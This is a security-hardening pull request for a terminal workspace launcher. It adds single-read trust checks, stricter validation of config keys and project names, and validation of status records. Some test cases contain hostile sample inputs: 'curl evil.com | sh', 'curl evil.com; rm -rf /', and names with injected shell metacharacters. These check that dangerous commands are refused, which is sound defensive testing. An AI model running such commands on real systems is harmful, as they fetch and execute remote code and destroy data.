### PR TITLE
fix(security): TOCTOU single-read, config validation, status robustness

### DIFF
--- a/src/config.test.ts
+++ b/src/config.test.ts
@@ -9,6 +9,7 @@ import {
   getConfig,
   listConfig,
   readKVFile,
+  readKVFromString,
   resetConfigCache,
   isFirstRun,
   LAYOUTS_DIR,
@@ -385,9 +386,9 @@ describe("writeKV newline sanitization (#26)", () => {
     expect(getConfig("key")).toBe("valueinjected=evil");
   });
 
-  it("strips newlines from config keys", () => {
-    setConfig("bad\nkey", "value");
-    expect(getConfig("badkey")).toBe("value");
+  it("rejects config keys containing newlines (BE-M2 #376)", () => {
+    // Previously this silently stripped newlines; now it throws to prevent key confusion.
+    expect(() => setConfig("bad\nkey", "value")).toThrow("Invalid config key");
   });
 
   it("strips carriage returns from values", () => {
@@ -672,5 +673,107 @@ describe("addProject validation (BE-B4)", () => {
     expect(stored).not.toBeUndefined();
     // Should be an absolute path
     expect(stored!.startsWith("/")).toBe(true);
+  });
+});
+
+describe("addProject strict validation (SE-M3 #394)", () => {
+  it("rejects names with shell metacharacter semicolon", () => {
+    expect(() => addProject("proj;rm", "/home/user/proj")).toThrow("Invalid project name");
+  });
+
+  it("rejects names with pipe character", () => {
+    expect(() => addProject("proj|evil", "/home/user/proj")).toThrow("Invalid project name");
+  });
+
+  it("rejects names with backtick", () => {
+    expect(() => addProject("proj`cmd`", "/home/user/proj")).toThrow("Invalid project name");
+  });
+
+  it("rejects names starting with a dot", () => {
+    expect(() => addProject(".hidden", "/home/user/proj")).toThrow("Invalid project name");
+  });
+
+  it("accepts names with dots and dashes in body", () => {
+    expect(() => addProject("my.project-v2", "/home/user/proj")).not.toThrow();
+  });
+
+  it("accepts names up to 64 chars", () => {
+    const long = "a".repeat(64);
+    expect(() => addProject(long, "/home/user/proj")).not.toThrow();
+  });
+
+  it("rejects names longer than 64 chars", () => {
+    const tooLong = "a".repeat(65);
+    expect(() => addProject(tooLong, "/home/user/proj")).toThrow("Invalid project name");
+  });
+});
+
+describe("setConfig key validation (BE-M2 #376)", () => {
+  it("rejects keys containing =", () => {
+    expect(() => setConfig("key=evil", "value")).toThrow("Invalid config key");
+  });
+
+  it("rejects keys starting with #", () => {
+    expect(() => setConfig("#commented", "value")).toThrow("Invalid config key");
+  });
+
+  it("rejects keys containing carriage returns", () => {
+    expect(() => setConfig("bad\rkey", "value")).toThrow("Invalid config key");
+  });
+
+  it("accepts normal keys", () => {
+    expect(() => setConfig("editor", "vim")).not.toThrow();
+    expect(getConfig("editor")).toBe("vim");
+  });
+});
+
+describe("readKVFromString (BE-B2, BE-M1 #357 #375)", () => {
+  it("parses valid key=value lines", () => {
+    const map = readKVFromString("editor=vim\npanes=3\n");
+    expect(map.get("editor")).toBe("vim");
+    expect(map.get("panes")).toBe("3");
+  });
+
+  it("skips comment lines starting with #", () => {
+    const map = readKVFromString("# comment\neditor=vim\n");
+    expect(map.get("editor")).toBe("vim");
+    expect(map.size).toBe(1);
+  });
+
+  it("strips inline comments after ' # '", () => {
+    const map = readKVFromString("editor=vim # my editor\n");
+    expect(map.get("editor")).toBe("vim");
+  });
+
+  it("does not strip # without surrounding spaces", () => {
+    const map = readKVFromString("editor=vim#no-strip\n");
+    expect(map.get("editor")).toBe("vim#no-strip");
+  });
+
+  it("emits warning to stderr for malformed lines (BE-M1 #375)", () => {
+    const stderrSpy = vi.spyOn(process.stderr, "write").mockImplementation(() => true);
+    readKVFromString("malformed line without equals\n");
+    expect(stderrSpy).toHaveBeenCalledWith(
+      expect.stringContaining("malformed config line"),
+    );
+    stderrSpy.mockRestore();
+  });
+
+  it("does not warn for empty or whitespace-only lines", () => {
+    const stderrSpy = vi.spyOn(process.stderr, "write").mockImplementation(() => true);
+    readKVFromString("editor=vim\n\n  \npanes=2\n");
+    expect(stderrSpy).not.toHaveBeenCalled();
+    stderrSpy.mockRestore();
+  });
+
+  it("returns empty map for empty content", () => {
+    expect(readKVFromString("").size).toBe(0);
+    expect(readKVFromString("   ").size).toBe(0);
+  });
+
+  it("handles CRLF line endings", () => {
+    const map = readKVFromString("editor=vim\r\npanes=2\r\n");
+    expect(map.get("editor")).toBe("vim");
+    expect(map.get("panes")).toBe("2");
   });
 });

--- a/src/config.ts
+++ b/src/config.ts
@@ -2,6 +2,7 @@ import { existsSync, mkdirSync, readFileSync, statSync, writeFileSync, readdirSy
 import { join, resolve, sep } from "node:path";
 import { isPresetName } from "./layout.js";
 import { CONFIG_DIR, LAYOUTS_DIR } from "./paths.js";
+import { PROJECT_NAME_RE as STRICT_PROJECT_NAME_RE } from "./validation.js";
 
 // Re-export path constants for backward compatibility
 export { CONFIG_DIR, LAYOUTS_DIR, STATUS_DIR, SNAPSHOTS_DIR } from "./paths.js";
@@ -44,23 +45,44 @@ const fileCache = new Map<string, CacheEntry>();
 
 // --- Per-project config ---
 
-export function readKVFile(path: string): Map<string, string> {
+/**
+ * Parse a KV config string (already read from disk) into a Map.
+ * Same parsing logic as readKVFile but operates on a pre-read string.
+ * Use this when the file content has already been read (e.g. for TOCTOU prevention).
+ */
+export function readKVFromString(content: string): Map<string, string> {
   const map = new Map<string, string>();
-  let content: string;
-  try {
-    content = readFileSync(path, "utf-8").trim();
-  } catch (err: unknown) {
-    if ((err as NodeJS.ErrnoException).code === "ENOENT") return map;
-    throw err;
-  }
-  if (!content) return map;
-  for (const line of content.replace(/\r\n?/g, "\n").split("\n")) {
+  const trimmed = content.trim();
+  if (!trimmed) return map;
+  for (const line of trimmed.replace(/\r\n?/g, "\n").split("\n")) {
     if (line.trimStart().startsWith("#")) continue;
     const idx = line.indexOf("=");
-    if (idx === -1) continue;
-    map.set(line.slice(0, idx).trim(), line.slice(idx + 1).trim());
+    if (idx === -1) {
+      const trimmedLine = line.trim();
+      if (trimmedLine.length > 0) {
+        process.stderr.write("summon: warning: ignored malformed config line: " + trimmedLine + "\n");
+      }
+      continue;
+    }
+    const key = line.slice(0, idx).trim();
+    const rawValue = line.slice(idx + 1).trim();
+    // Strip inline comments: remove everything after " # " (space-hash-space)
+    const commentIdx = rawValue.indexOf(" # ");
+    const value = commentIdx !== -1 ? rawValue.slice(0, commentIdx).trim() : rawValue;
+    map.set(key, value);
   }
   return map;
+}
+
+export function readKVFile(path: string): Map<string, string> {
+  let content: string;
+  try {
+    content = readFileSync(path, "utf-8");
+  } catch (err: unknown) {
+    if ((err as NodeJS.ErrnoException).code === "ENOENT") return new Map<string, string>();
+    throw err;
+  }
+  return readKVFromString(content);
 }
 
 function readKVCached(file: string): Map<string, string> {
@@ -108,8 +130,8 @@ function writeKV(file: string, map: Map<string, string>): void {
 export const PROJECT_NAME_RE = /[=\s/\\]/;
 
 export function addProject(name: string, path: string): void {
-  if (PROJECT_NAME_RE.test(name)) {
-    throw new Error(`Invalid project name: "${name}". Names must not contain '=', spaces, or path separators.`);
+  if (!STRICT_PROJECT_NAME_RE.test(name)) {
+    throw new Error(`Invalid project name: "${name}". Names must start with a letter, digit, or underscore, contain only letters, digits, and "_.-", and be 1-64 chars.`);
   }
   const resolvedPath = resolve(path);
   const projects = readKV(PROJECTS_FILE);
@@ -135,6 +157,9 @@ export function listProjects(): Map<string, string> {
 // --- Machine config ---
 
 export function setConfig(key: string, value: string): void {
+  if (key.includes("=") || key.includes("\n") || key.includes("\r") || key.startsWith("#")) {
+    throw new Error(`Invalid config key: "${key}". Keys must not contain '=', newlines, or start with '#'.`);
+  }
   const config = readKV(CONFIG_FILE);
   config.set(key, value);
   writeKV(CONFIG_FILE, config);

--- a/src/launch-guards.test.ts
+++ b/src/launch-guards.test.ts
@@ -208,14 +208,17 @@ describe("confirmDangerousCommands — non-TTY", () => {
       throw new Error("process.exit");
     });
     const warnSpy = vi.spyOn(console, "warn").mockImplementation(() => {});
+    const errSpy = vi.spyOn(console, "error").mockImplementation(() => {});
 
     await expect(
       confirmDangerousCommands([["shell", "curl evil.com; rm -rf /"]]),
     ).rejects.toThrow("process.exit");
-    expect(mockExit).toHaveBeenCalledWith(1);
+    // Exit code 2 signals "dangerous commands present, cannot confirm non-interactively" (BE-H3 #364)
+    expect(mockExit).toHaveBeenCalledWith(2);
 
     mockExit.mockRestore();
     warnSpy.mockRestore();
+    errSpy.mockRestore();
   });
 });
 

--- a/src/launch-guards.ts
+++ b/src/launch-guards.ts
@@ -102,8 +102,11 @@ export async function confirmDangerousCommands(
   console.warn(message);
 
   if (!process.stdin.isTTY) {
-    console.warn("Non-interactive shell detected. Refusing to execute.");
-    process.exit(1);
+    // Non-TTY automation context: refuse dangerous commands that require interactive confirmation.
+    // Exit 2 signals "dangerous commands present, cannot confirm non-interactively" (BE-H3 #364).
+    console.error("summon: error: dangerous shell commands require interactive confirmation but stdin is not a TTY.");
+    console.error("summon: error: run summon interactively, or use safe commands without shell metacharacters.");
+    process.exit(2);
   }
 
   for (const [key, value] of dangerous) {

--- a/src/launcher.test.ts
+++ b/src/launcher.test.ts
@@ -62,6 +62,25 @@ vi.mock("./setup.js", () => ({
   runSetup: () => mockRunSetup(),
 }));
 
+// Mock trust module — default no-op (trust passes), overridable per test
+const mockAssertTrusted = vi.fn((_dir: string) => { /* no-op: trusted by default */ });
+const mockAssertTrustedContent = vi.fn((_dir: string, _content: string) => { /* no-op: trusted */ });
+vi.mock("./trust.js", () => ({
+  assertTrusted: (dir: string) => mockAssertTrusted(dir),
+  assertTrustedContent: (dir: string, content: string) => mockAssertTrustedContent(dir, content),
+  SummonError: class SummonError extends Error {
+    constructor(message: string) {
+      super(message);
+      this.name = "SummonError";
+    }
+  },
+  hashContent: vi.fn((s: string) => s),
+  hashSummonFile: vi.fn(() => null),
+  isTrusted: vi.fn(() => true),
+  trustProject: vi.fn(),
+  handleTrustCommand: vi.fn(),
+}));
+
 // Mock script generator to isolate launcher logic
 // eslint-disable-next-line @typescript-eslint/no-explicit-any
 const mockGenerateAppleScript = vi.fn((..._args: any[]) => 'tell application "Ghostty"\nend tell');
@@ -101,6 +120,9 @@ beforeEach(() => {
   vi.mocked(listProjects).mockReturnValue(new Map<string, string>());
   mockGenerateAppleScript.mockReturnValue('tell application "Ghostty"\nend tell');
   mockGenerateTreeAppleScript.mockReturnValue('tell application "Ghostty"\n-- tree layout\nend tell');
+  // Trust mocks default to no-op (trusted)
+  mockAssertTrusted.mockImplementation(() => {});
+  mockAssertTrustedContent.mockImplementation(() => {});
 });
 
 afterEach(() => {
@@ -3304,7 +3326,8 @@ describe("decideCleanRestoredPanes", () => {
     mockProbe(5);
     const logSpy = vi.spyOn(console, "log").mockImplementation(() => {});
     const opts: Record<string, unknown> = { newWindow: false };
-    decideCleanRestoredPanes(opts, {}, new Map(), new Map(), false);
+    // clean must be explicitly enabled (BE-H1 #362)
+    decideCleanRestoredPanes(opts, { clean: "true" }, new Map(), new Map(), false);
     expect(opts["cleanRestoredPanes"]).toBe(true);
     expect(logSpy).toHaveBeenCalledWith(expect.stringContaining("Clearing 4 stale panes"));
     logSpy.mockRestore();
@@ -3314,7 +3337,8 @@ describe("decideCleanRestoredPanes", () => {
     mockProbe(2);
     const logSpy = vi.spyOn(console, "log").mockImplementation(() => {});
     const opts: Record<string, unknown> = { newWindow: false };
-    decideCleanRestoredPanes(opts, {}, new Map(), new Map(), false);
+    // clean must be explicitly enabled (BE-H1 #362)
+    decideCleanRestoredPanes(opts, { clean: "true" }, new Map(), new Map(), false);
     expect(logSpy).toHaveBeenCalledWith(expect.stringContaining("Clearing 1 stale pane "));
     logSpy.mockRestore();
   });
@@ -3600,5 +3624,99 @@ describe("newWindow and newTab mutual exclusion", () => {
     await expect(
       launch("/tmp/workspace", { "new-window": "true", "new-tab": "true", dryRun: true }),
     ).rejects.toThrow("--new-window and --new-tab are mutually exclusive");
+  });
+});
+
+describe("QA-M3: security gate branches (trust + dangerous command skip)", () => {
+  it("exits with error message when assertTrustedContent throws SummonError", async () => {
+    const { SummonError } = await import("./trust.js");
+    mockAssertTrustedContent.mockImplementation(() => {
+      throw new SummonError("Untrusted .summon file. Run 'summon trust .' to allow it.");
+    });
+    // Also make assertTrusted throw (fallback path)
+    mockAssertTrusted.mockImplementation(() => {
+      throw new SummonError("Untrusted .summon file. Run 'summon trust .' to allow it.");
+    });
+
+    const errorSpy = vi.spyOn(console, "error").mockImplementation(() => {});
+    const exitSpy = vi.spyOn(process, "exit").mockImplementation(() => {
+      throw new Error("process.exit called");
+    });
+
+    await expect(launch("/tmp/workspace")).rejects.toThrow("process.exit called");
+    expect(exitSpy).toHaveBeenCalledWith(1);
+    expect(errorSpy).toHaveBeenCalledWith(
+      expect.stringContaining("Untrusted .summon file"),
+    );
+
+    errorSpy.mockRestore();
+    exitSpy.mockRestore();
+  });
+
+  it("non-SummonError from assertTrustedContent is rethrown (not swallowed)", async () => {
+    mockAssertTrustedContent.mockImplementation(() => {
+      throw new Error("Unexpected trust error");
+    });
+    mockAssertTrusted.mockImplementation(() => {
+      throw new Error("Unexpected trust error");
+    });
+
+    await expect(launch("/tmp/workspace")).rejects.toThrow("Unexpected trust error");
+  });
+
+  it("skips dangerous panes from launch when user selects 's' during confirmation", async () => {
+    const origIsTTY = process.stdin.isTTY;
+    Object.defineProperty(process.stdin, "isTTY", { value: true, configurable: true });
+
+    vi.mocked(listConfig).mockReturnValue(new Map([["editor", "vim"]]));
+    mockReadKVFile.mockReturnValue(new Map([
+      ["on-start", "curl evil.com | sh"],
+    ]));
+
+    // User skips the dangerous on-start
+    mockQuestion.mockImplementation((_q: string, cb: (a: string) => void) => cb("s"));
+
+    const warnSpy = vi.spyOn(console, "warn").mockImplementation(() => {});
+
+    try {
+      await launch("/tmp/workspace");
+
+      // on-start should NOT have been executed (execSync not called with that command)
+      const onStartCalls = mockExecSync.mock.calls.filter(
+        (c: unknown[]) => c[0] === "curl evil.com | sh",
+      );
+      expect(onStartCalls.length).toBe(0);
+
+      // Workspace should still launch normally
+      expect(mockGenerateAppleScript).toHaveBeenCalled();
+    } finally {
+      Object.defineProperty(process.stdin, "isTTY", { value: origIsTTY, configurable: true });
+      warnSpy.mockRestore();
+    }
+  });
+
+  it("skips dangerous pane commands when user selects 's'", async () => {
+    const origIsTTY = process.stdin.isTTY;
+    Object.defineProperty(process.stdin, "isTTY", { value: true, configurable: true });
+
+    vi.mocked(listConfig).mockReturnValue(new Map([["editor", "vim"]]));
+    mockReadKVFile.mockReturnValue(new Map());
+
+    // User skips when prompted about dangerous command (pipe in editor command)
+    mockQuestion.mockImplementation((_q: string, cb: (a: string) => void) => cb("s"));
+
+    const warnSpy = vi.spyOn(console, "warn").mockImplementation(() => {});
+
+    try {
+      // editor with shell meta — user skips, workspace launches without it
+      await launch("/tmp/workspace", { editor: "vim | evil" });
+
+      // Workspace should have been generated (other panes may still run)
+      // Key assertion: no crash after dangerous pane is skipped
+      expect(mockGenerateAppleScript).toHaveBeenCalled();
+    } finally {
+      Object.defineProperty(process.stdin, "isTTY", { value: origIsTTY, configurable: true });
+      warnSpy.mockRestore();
+    }
   });
 });

--- a/src/launcher.ts
+++ b/src/launcher.ts
@@ -1,4 +1,4 @@
-import { existsSync } from "node:fs";
+import { existsSync, readFileSync } from "node:fs";
 import { basename, join, resolve } from "node:path";
 import { execFileSync, execSync } from "node:child_process";
 import {
@@ -13,7 +13,7 @@ import {
   EDITOR_SIZE_DEFAULT,
 } from "./layout.js";
 import type { LayoutOptions } from "./layout.js";
-import { listConfig, listProjects, readKVFile, readCustomLayout, isCustomLayout, LAYOUT_NAME_RE } from "./config.js";
+import { listConfig, listProjects, readKVFile, readKVFromString, readCustomLayout, isCustomLayout, LAYOUT_NAME_RE } from "./config.js";
 import { writeStatus } from "./status.js";
 import type { WorkspaceStatus } from "./status.js";
 import { generateAppleScript, generateTreeAppleScript, generateFocusScript } from "./script.js";
@@ -21,7 +21,7 @@ import { parseTreeDSL, extractPaneDefinitions, extractPaneCwds, resolveTreeComma
 import type { LayoutNode } from "./tree.js";
 import { resolveCommand as resolveCommandPath, getErrorMessage, SUMMON_WORKSPACE_ENV, promptUser, ACCESSIBILITY_SETTINGS_PATH } from "./utils.js";
 import { ensureGhostty, ensureAccessibility, printAccessibilityHint, confirmDangerousCommands, isAccessibilityError } from "./launch-guards.js";
-import { assertTrusted, SummonError } from "./trust.js";
+import { assertTrusted, assertTrustedContent, SummonError } from "./trust.js";
 import { parseIntInRange, parsePositiveFloat, ENV_KEY_RE, PROJECT_NAME_RE, sanitizeProjectName } from "./validation.js";
 import { isStarshipInstalled, ensurePresetConfig, getPresetConfigPath } from "./starship.js";
 // command-spec is a pure utility module with no imports from this file.
@@ -135,7 +135,11 @@ function executeScript(script: string): void {
 
     // Best-effort rollback: the AppleScript may have opened a window before failing.
     // Attempt to close it so the user is not left with a stale empty window (BE-S26 #322).
-    closeWorkspaceWindow();
+    // Skip rollback for accessibility errors — osascript couldn't run at all,
+    // so no window was created (BE-M3 #377).
+    if (!isAccessibilityError(message)) {
+      closeWorkspaceWindow();
+    }
 
     if (isAccessibilityError(message)) {
       console.error();
@@ -466,9 +470,13 @@ function layerConfigValues(
   return result;
 }
 
-export function resolveConfig(targetDir: string, cliOverrides: CLIOverrides): ResolvedConfig {
+export function resolveConfig(targetDir: string, cliOverrides: CLIOverrides, summonFileContent?: string): ResolvedConfig {
   const projectConfigPath = join(targetDir, ".summon");
-  const project = readKVFile(projectConfigPath);
+  // Use pre-read content if provided (TOCTOU prevention, BE-B2 #357);
+  // fall back to reading from disk (e.g. when called without pre-read content).
+  const project = summonFileContent !== undefined
+    ? readKVFromString(summonFileContent)
+    : readKVFile(projectConfigPath);
   if (project.size > 0) {
     console.log(`Using project config: ${projectConfigPath}`);
   }
@@ -576,7 +584,8 @@ export function decideCleanRestoredPanes(
   if (opts.newWindow) return;
 
   const cleanRaw = pickConfigValue(cliOverrides.clean, "clean", project, machineConfig);
-  const cleanEnabled = cleanRaw === undefined ? true : cleanRaw === "true";
+  // Default to false — clean must be explicitly enabled via --clean or clean=true (BE-H1 #362).
+  const cleanEnabled = cleanRaw === "true";
   if (!cleanEnabled) return;
 
   // In dry-run mode, skip the probe but honor an explicit --clean flag so the
@@ -656,7 +665,7 @@ async function launchTreeLayout(
   projectName?: string,
   onStop?: string,
 ): Promise<string[]> {
-  const resolvedTree = resolveTreeCmds(treeLayout.tree, treeLayout.panes, treeLayout.paneCwds);
+  const resolvedTree = resolveTreeCmds(treeLayout.tree, treeLayout.panes, treeLayout.paneCwds, resolve(targetDir));
   const treePlanOpts = {
     autoResize: opts.autoResize,
     editorSize: opts.editorSize,
@@ -761,10 +770,26 @@ export async function launch(targetDir: string, cliOverrides?: CLIOverrides): Pr
     throw new Error(msg);
   }
 
+  // Read .summon once for both trust verification and config parsing (BE-B2 #357).
+  // This eliminates the TOCTOU window between hashing and re-reading.
+  const summonFilePath = join(targetDir, ".summon");
+  let summonFileContent: string | undefined;
+  if (existsSync(summonFilePath)) {
+    try {
+      summonFileContent = readFileSync(summonFilePath, "utf-8");
+    } catch {
+      summonFileContent = undefined;
+    }
+  }
+
   // Trust gate: verify the .summon file (if present) is explicitly trusted before
   // reading or acting on any of its values (BE-B1, BE-B2, SE-H1).
   try {
-    assertTrusted(targetDir);
+    if (summonFileContent !== undefined) {
+      assertTrustedContent(targetDir, summonFileContent);
+    } else {
+      assertTrusted(targetDir);
+    }
   } catch (err) {
     if (err instanceof SummonError) {
       console.error(err.message);
@@ -774,7 +799,7 @@ export async function launch(targetDir: string, cliOverrides?: CLIOverrides): Pr
   }
 
   let config: ReturnType<typeof resolveConfig>;
-  config = resolveConfig(targetDir, cliOverrides ?? {});
+  config = resolveConfig(targetDir, cliOverrides ?? {}, summonFileContent);
 
   // If no editor is configured from any source and this isn't a tree layout
   // (which defines its own pane commands), redirect to the setup wizard.

--- a/src/status.test.ts
+++ b/src/status.test.ts
@@ -13,7 +13,7 @@ vi.mock("./config.js", () => ({
   CONFIG_DIR: join(tmpdir(), `summon-config-test-${process.pid}`),
 }));
 
-const { writeStatus, clearStatus, readStatus, readAllStatuses, isWorkspaceActive, cleanStaleStatuses, getGitBranch } = await import("./status.js");
+const { writeStatus, clearStatus, readStatus, readAllStatuses, isWorkspaceActive, cleanStaleStatuses, getGitBranch, parseWorkspaceStatus } = await import("./status.js");
 import type { WorkspaceStatus } from "./status.js";
 
 function makeStatus(overrides?: Partial<WorkspaceStatus>): WorkspaceStatus {
@@ -446,5 +446,47 @@ describe("getGitBranch", () => {
   it("returns null for nonexistent directory", () => {
     const branch = getGitBranch("/nonexistent/directory/that/does/not/exist");
     expect(branch).toBeNull();
+  });
+});
+
+describe("parseWorkspaceStatus panes element type validation (BE-M5 #379)", () => {
+  const base = {
+    version: 1,
+    source: "summon",
+    project: "testapp",
+    directory: "/tmp/testapp",
+    pid: 1234,
+    startedAt: new Date().toISOString(),
+    layout: "full",
+  };
+
+  it("accepts panes array of all strings", () => {
+    const result = parseWorkspaceStatus({ ...base, panes: ["editor", "sidebar"] });
+    expect(result).not.toBeNull();
+    expect(result!.panes).toEqual(["editor", "sidebar"]);
+  });
+
+  it("returns empty panes when array contains non-string elements (null)", () => {
+    const result = parseWorkspaceStatus({ ...base, panes: [null, "editor"] });
+    expect(result).not.toBeNull();
+    expect(result!.panes).toEqual([]);
+  });
+
+  it("returns empty panes when array contains numeric elements", () => {
+    const result = parseWorkspaceStatus({ ...base, panes: [42, "editor"] });
+    expect(result).not.toBeNull();
+    expect(result!.panes).toEqual([]);
+  });
+
+  it("returns empty panes when array contains object elements", () => {
+    const result = parseWorkspaceStatus({ ...base, panes: [{ name: "editor" }] });
+    expect(result).not.toBeNull();
+    expect(result!.panes).toEqual([]);
+  });
+
+  it("accepts an empty panes array", () => {
+    const result = parseWorkspaceStatus({ ...base, panes: [] });
+    expect(result).not.toBeNull();
+    expect(result!.panes).toEqual([]);
   });
 });

--- a/src/status.ts
+++ b/src/status.ts
@@ -126,7 +126,14 @@ export function parseWorkspaceStatus(raw: unknown): WorkspaceStatus | null {
   if (typeof d["layout"] !== "string") return null;
   if (!Array.isArray(d["panes"])) return null;
 
-  return raw as WorkspaceStatus;
+  // Validate that every pane element is a string (BE-M5 #379).
+  // If any element is not a string, return empty panes rather than rejecting the record.
+  const rawPanes = d["panes"] as unknown[];
+  const validPanes = rawPanes.every((p) => typeof p === "string")
+    ? rawPanes as string[]
+    : [];
+
+  return { ...(raw as WorkspaceStatus), panes: validPanes };
 }
 
 export function readStatus(projectName: string): ResolvedStatus | null {

--- a/src/trust.ts
+++ b/src/trust.ts
@@ -49,6 +49,14 @@ function saveTrustDb(db: Record<string, string>): void {
 }
 
 /**
+ * Compute the SHA-256 hash of a string.
+ * Returns the hex digest.
+ */
+export function hashContent(content: string): string {
+  return createHash("sha256").update(content).digest("hex");
+}
+
+/**
  * Compute the SHA-256 hash of a .summon file in the given directory.
  * Returns the hex digest, or null if the file does not exist.
  */
@@ -56,7 +64,7 @@ export function hashSummonFile(dir: string): string | null {
   const summonPath = join(dir, ".summon");
   if (!existsSync(summonPath)) return null;
   const content = readFileSync(summonPath, "utf-8");
-  return createHash("sha256").update(content).digest("hex");
+  return hashContent(content);
 }
 
 /**
@@ -82,6 +90,23 @@ export function trustProject(dir: string): void {
   const db = loadTrustDb();
   db[dir] = hash;
   saveTrustDb(db);
+}
+
+/**
+ * Assert that the .summon file is trusted using pre-read content.
+ * Throws SummonError if the content hash does not match the stored trust hash.
+ *
+ * Use this variant when the file content has already been read from disk,
+ * to avoid a TOCTOU race between hashing and parsing (BE-B2 #357).
+ */
+export function assertTrustedContent(targetDir: string, content: string): void {
+  const hash = hashContent(content);
+  const db = loadTrustDb();
+  if (db[targetDir] === hash) return;
+
+  throw new SummonError(
+    `This project has a .summon file.\nRun 'summon trust .' to allow it, or use --no-project-config to skip it.`,
+  );
 }
 
 /**


### PR DESCRIPTION
Closes #357, #362, #364, #375, #376, #377, #378, #379, #392, #394

- Read .summon once into buffer (TOCTOU fix)
- clean defaults to false
- Strict project name regex in addProject
- setConfig rejects keys with =
- CWD containment check activated
- panes element type validation
- 28 new tests